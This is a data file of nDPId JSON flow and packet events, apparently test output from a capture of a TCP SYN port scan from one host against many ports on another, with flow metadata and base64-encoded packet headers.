+00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":239,"source":"synscan.pcap","alias":"nDPId-test","flow_id":233,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058405,"flow_last_seen":1278275058405,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058405,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":239,"source":"synscan.pcap","alias":"nDPId-test","flow_id":233,"flow_packet_id":1,"flow_last_seen":1278275058405,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058405,"pkt":"ACYLMQczACWzv5HuCABFAAAsVHsAAC4GxfesEAAIQA2GNIzTD6DdU4MZAAAAAGACDAAc7AAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":240,"source":"synscan.pcap","alias":"nDPId-test","flow_id":234,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058406,"flow_last_seen":1278275058406,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058406,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1433,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":240,"source":"synscan.pcap","alias":"nDPId-test","flow_id":234,"flow_packet_id":1,"flow_last_seen":1278275058406,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058406,"pkt":"ACYLMQczACWzv5HuCABFAAAsv0EAADsGTjGsEAAIQA2GNIzTBZndU4MZAAAAAGACEAAi8wAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":241,"source":"synscan.pcap","alias":"nDPId-test","flow_id":235,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058406,"flow_last_seen":1278275058406,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058406,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6669,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":241,"source":"synscan.pcap","alias":"nDPId-test","flow_id":235,"flow_packet_id":1,"flow_last_seen":1278275058406,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058406,"pkt":"ACYLMQczACWzv5HuCABFAAAsnBAAADUGd2KsEAAIQA2GNIzTGg3dU4MZAAAAAGACCAAWfwAAAgQFtA=="} 
+00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":242,"source":"synscan.pcap","alias":"nDPId-test","flow_id":236,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058470,"flow_last_seen":1278275058470,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058470,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9071,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":242,"source":"synscan.pcap","alias":"nDPId-test","flow_id":236,"flow_packet_id":1,"flow_last_seen":1278275058470,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058470,"pkt":"ACYLMQczACWzv5HuCABFAAAssvkAAC0GaHmsEAAIQA2GNIzTI2\/dU4MZAAAAAGACCAANHQAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":243,"source":"synscan.pcap","alias":"nDPId-test","flow_id":237,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058470,"flow_last_seen":1278275058470,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058470,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9010,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":243,"source":"synscan.pcap","alias":"nDPId-test","flow_id":237,"flow_packet_id":1,"flow_last_seen":1278275058470,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058470,"pkt":"ACYLMQczACWzv5HuCABFAAAsYaYAACsGu8ysEAAIQA2GNIzTIzLdU4MZAAAAAGACEAAFWgAAAgQFtA=="} +00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":244,"source":"synscan.pcap","alias":"nDPId-test","flow_id":238,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058470,"flow_last_seen":1278275058470,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058470,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":765,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":244,"source":"synscan.pcap","alias":"nDPId-test","flow_id":238,"flow_packet_id":1,"flow_last_seen":1278275058470,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058470,"pkt":"ACYLMQczACWzv5HuCABFAAAsqmkAAC8GbwmsEAAIQA2GNIzTAv3dU4MZAAAAAGACEAAljwAAAgQFtA=="} 
+00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":245,"source":"synscan.pcap","alias":"nDPId-test","flow_id":239,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058470,"flow_last_seen":1278275058470,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058470,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2099,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":245,"source":"synscan.pcap","alias":"nDPId-test","flow_id":239,"flow_packet_id":1,"flow_last_seen":1278275058470,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058470,"pkt":"ACYLMQczACWzv5HuCABFAAAsJaUAACsG982sEAAIQA2GNIzTCDPdU4MZAAAAAGACEAAgWQAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":246,"source":"synscan.pcap","alias":"nDPId-test","flow_id":240,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058470,"flow_last_seen":1278275058470,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058470,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8649,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":246,"source":"synscan.pcap","alias":"nDPId-test","flow_id":240,"flow_packet_id":1,"flow_last_seen":1278275058470,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058470,"pkt":"ACYLMQczACWzv5HuCABFAAAs0Q0AADYGQWWsEAAIQA2GNIzTIcndU4MZAAAAAGACDAAKwwAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":247,"source":"synscan.pcap","alias":"nDPId-test","flow_id":241,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058470,"flow_last_seen":1278275058470,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058470,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1111,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":247,"source":"synscan.pcap","alias":"nDPId-test","flow_id":241,"flow_packet_id":1,"flow_last_seen":1278275058470,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058470,"pkt":"ACYLMQczACWzv5HuCABFAAAsN7MAACsG5b+sEAAIQA2GNIzTBFfdU4MZAAAAAGACEAAkNQAAAgQFtA=="} 
+00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":248,"source":"synscan.pcap","alias":"nDPId-test","flow_id":242,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058470,"flow_last_seen":1278275058470,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058470,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1064,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":248,"source":"synscan.pcap","alias":"nDPId-test","flow_id":242,"flow_packet_id":1,"flow_last_seen":1278275058470,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058470,"pkt":"ACYLMQczACWzv5HuCABFAAAsBlAAADkGCSOsEAAIQA2GNIzTBCjdU4MZAAAAAGACCAAsZAAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":249,"source":"synscan.pcap","alias":"nDPId-test","flow_id":243,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058470,"flow_last_seen":1278275058470,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058470,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1095,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":249,"source":"synscan.pcap","alias":"nDPId-test","flow_id":243,"flow_packet_id":1,"flow_last_seen":1278275058470,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058470,"pkt":"ACYLMQczACWzv5HuCABFAAAsHiIAACwG\/lCsEAAIQA2GNIzTBEfdU4MZAAAAAGACBAAwRQAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":250,"source":"synscan.pcap","alias":"nDPId-test","flow_id":244,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058470,"flow_last_seen":1278275058470,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058470,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5033,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":250,"source":"synscan.pcap","alias":"nDPId-test","flow_id":244,"flow_packet_id":1,"flow_last_seen":1278275058470,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058470,"pkt":"ACYLMQczACWzv5HuCABFAAAsYccAAC4GuKusEAAIQA2GNIzTE6ndU4MZAAAAAGACDAAY4wAAAgQFtA=="} 
+00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":251,"source":"synscan.pcap","alias":"nDPId-test","flow_id":245,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058470,"flow_last_seen":1278275058470,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058470,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3071,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":251,"source":"synscan.pcap","alias":"nDPId-test","flow_id":245,"flow_packet_id":1,"flow_last_seen":1278275058470,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058470,"pkt":"ACYLMQczACWzv5HuCABFAAAswmkAADEGVQmsEAAIQA2GNIzTC\/\/dU4MZAAAAAGACCAAkjQAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":252,"source":"synscan.pcap","alias":"nDPId-test","flow_id":246,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058470,"flow_last_seen":1278275058470,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058470,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6543,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":252,"source":"synscan.pcap","alias":"nDPId-test","flow_id":246,"flow_packet_id":1,"flow_last_seen":1278275058470,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058470,"pkt":"ACYLMQczACWzv5HuCABFAAAsPAwAACwG4GasEAAIQA2GNIzTGY\/dU4MZAAAAAGACBAAa\/QAAAgQFtA=="} +00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":253,"source":"synscan.pcap","alias":"nDPId-test","flow_id":247,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058470,"flow_last_seen":1278275058470,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058470,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":808,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":253,"source":"synscan.pcap","alias":"nDPId-test","flow_id":247,"flow_packet_id":1,"flow_last_seen":1278275058470,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058470,"pkt":"ACYLMQczACWzv5HuCABFAAAsbAwAADAGrGasEAAIQA2GNIzTAyjdU4MZAAAAAGACBAAxZAAAAgQFtA=="} 
+00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":254,"source":"synscan.pcap","alias":"nDPId-test","flow_id":248,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058470,"flow_last_seen":1278275058470,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058470,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":30718,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":254,"source":"synscan.pcap","alias":"nDPId-test","flow_id":248,"flow_packet_id":1,"flow_last_seen":1278275058470,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058470,"pkt":"ACYLMQczACWzv5HuCABFAAAsBZkAACgGGtqsEAAIQA2GNIzTd\/7dU4MZAAAAAGACBAC8jQAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":255,"source":"synscan.pcap","alias":"nDPId-test","flow_id":249,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058471,"flow_last_seen":1278275058471,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058471,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1071,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":255,"source":"synscan.pcap","alias":"nDPId-test","flow_id":249,"flow_packet_id":1,"flow_last_seen":1278275058471,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058471,"pkt":"ACYLMQczACWzv5HuCABFAAAs4HIAADEGNwCsEAAIQA2GNIzTBC\/dU4MZAAAAAGACCAAsXQAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":256,"source":"synscan.pcap","alias":"nDPId-test","flow_id":250,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058471,"flow_last_seen":1278275058471,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058471,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7496,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":256,"source":"synscan.pcap","alias":"nDPId-test","flow_id":250,"flow_packet_id":1,"flow_last_seen":1278275058471,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058471,"pkt":"ACYLMQczACWzv5HuCABFAAAsfiUAACsGn02sEAAIQA2GNIzTHUjdU4MZAAAAAGACEAALRAAAAgQFtA=="} 
+00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":257,"source":"synscan.pcap","alias":"nDPId-test","flow_id":251,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058471,"flow_last_seen":1278275058471,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058471,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":44176,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":257,"source":"synscan.pcap","alias":"nDPId-test","flow_id":251,"flow_packet_id":1,"flow_last_seen":1278275058471,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058471,"pkt":"ACYLMQczACWzv5HuCABFAAAsjG4AAC8GjQSsEAAIQA2GNIzSrJDdUoMYAAAAAGACEAB7\/gAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":258,"source":"synscan.pcap","alias":"nDPId-test","flow_id":252,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058471,"flow_last_seen":1278275058471,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058471,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1183,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":258,"source":"synscan.pcap","alias":"nDPId-test","flow_id":252,"flow_packet_id":1,"flow_last_seen":1278275058471,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058471,"pkt":"ACYLMQczACWzv5HuCABFAAAs3y8AAC4GO0OsEAAIQA2GNIzSBJ\/dUoMYAAAAAGACDAAn8AAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":259,"source":"synscan.pcap","alias":"nDPId-test","flow_id":253,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058471,"flow_last_seen":1278275058471,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058471,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":49999,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":259,"source":"synscan.pcap","alias":"nDPId-test","flow_id":253,"flow_packet_id":1,"flow_last_seen":1278275058471,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058471,"pkt":"ACYLMQczACWzv5HuCABFAAAsOzYAADsG0jysEAAIQA2GNIzSw0\/dUoMYAAAAAGACEABlPwAAAgQFtA=="} 
+00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":260,"source":"synscan.pcap","alias":"nDPId-test","flow_id":254,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058471,"flow_last_seen":1278275058471,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058471,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8300,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":260,"source":"synscan.pcap","alias":"nDPId-test","flow_id":254,"flow_packet_id":1,"flow_last_seen":1278275058471,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058471,"pkt":"ACYLMQczACWzv5HuCABFAAAsPfYAADQG1nysEAAIQA2GNIzSIGzdUoMYAAAAAGACBAAUIwAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":261,"source":"synscan.pcap","alias":"nDPId-test","flow_id":255,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058471,"flow_last_seen":1278275058471,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058471,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":11967,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":261,"source":"synscan.pcap","alias":"nDPId-test","flow_id":255,"flow_packet_id":1,"flow_last_seen":1278275058471,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058471,"pkt":"ACYLMQczACWzv5HuCABFAAAsTF8AACoG0hOsEAAIQA2GNIzSLr\/dUoMYAAAAAGACDAD9zwAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":262,"source":"synscan.pcap","alias":"nDPId-test","flow_id":256,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058471,"flow_last_seen":1278275058471,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058471,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3945,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":262,"source":"synscan.pcap","alias":"nDPId-test","flow_id":256,"flow_packet_id":1,"flow_last_seen":1278275058471,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058471,"pkt":"ACYLMQczACWzv5HuCABFAAAsN1gAAC4G4xqsEAAIQA2GNIzSD2ndUoMYAAAAAGACDAAdJgAAAgQFtA=="} 
+00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":263,"source":"synscan.pcap","alias":"nDPId-test","flow_id":257,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058471,"flow_last_seen":1278275058471,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058471,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5431,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 